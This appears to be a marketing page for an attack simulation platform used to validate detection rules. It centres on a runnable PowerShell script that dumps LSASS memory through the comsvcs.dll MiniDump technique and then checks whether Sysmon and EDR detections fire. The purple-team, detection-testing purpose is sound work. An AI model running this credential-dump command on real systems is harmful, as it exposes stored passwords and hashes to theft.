Threadlinqs ships 300+ attack simulation scenarios tied to real-world threats. Each simulation is a runnable script in PowerShell, Bash, or Python that replicates the exact techniques used by threat actors, so your team can validate detection rules and security controls in controlled environments.
Attack simulations are controlled, reproducible scripts that emulate the exact behavior of real-world threat actors. Instead of guessing whether your EDR catches a particular technique, you run the simulation in a lab and watch what happens. If your detections fire, your controls work. If they do not, you know exactly what to fix.
Every simulation on Threadlinqs is linked to a specific threat report, so you can trace the simulation back to the original campaign, see the IOCs involved, and cross-reference the detection rules that should trigger.
Simulations are written for the environments where threats actually execute. Pick the format that matches your lab setup.
Below is a real simulation from the platform that emulates LSASS credential dumping via MiniDump, mapped to MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory).
POWERSHELL# Simulation: LSASS Credential Dump via MiniDump API
# MITRE: T1003.001 (OS Credential Dumping: LSASS Memory)
# Threat: Mimikatz / Credential Access Campaign
# Run in elevated lab environment only
$lsass = Get-Process lsass
$dumpPath = "$env:TEMP\lsass_sim_$(Get-Date -f yyyyMMdd).dmp"
# Use comsvcs.dll MiniDump (LOLBin technique)
rundll32.exe C:\Windows\System32\comsvcs.dll, `
MiniDump $lsass.Id $dumpPath full
if (Test-Path $dumpPath) {
Write-Host "[+] Dump created: $dumpPath"
Write-Host "[+] Expected detections:"
Write-Host " - Sysmon EventCode 10 (ProcessAccess)"
Write-Host " - comsvcs.dll MiniDump invocation"
Remove-Item $dumpPath -Force
} else {
Write-Host "[-] Dump blocked - controls working"
}
After running the simulation, check whether your Sysmon EventCode 10 and comsvcs.dll detection rules fired. The corresponding SPL/KQL/Sigma rules are available on the detection engineering page.
Simulations are designed for a closed-loop purple team workflow where red team execution is immediately validated against blue team detections.
Simulations span all phases of the MITRE ATT&CK kill chain, with depth in the techniques most exploited by active threat actors.
Validate your security controls against 300+ real-world attack scenarios.
[ explore_simulations ] view pricing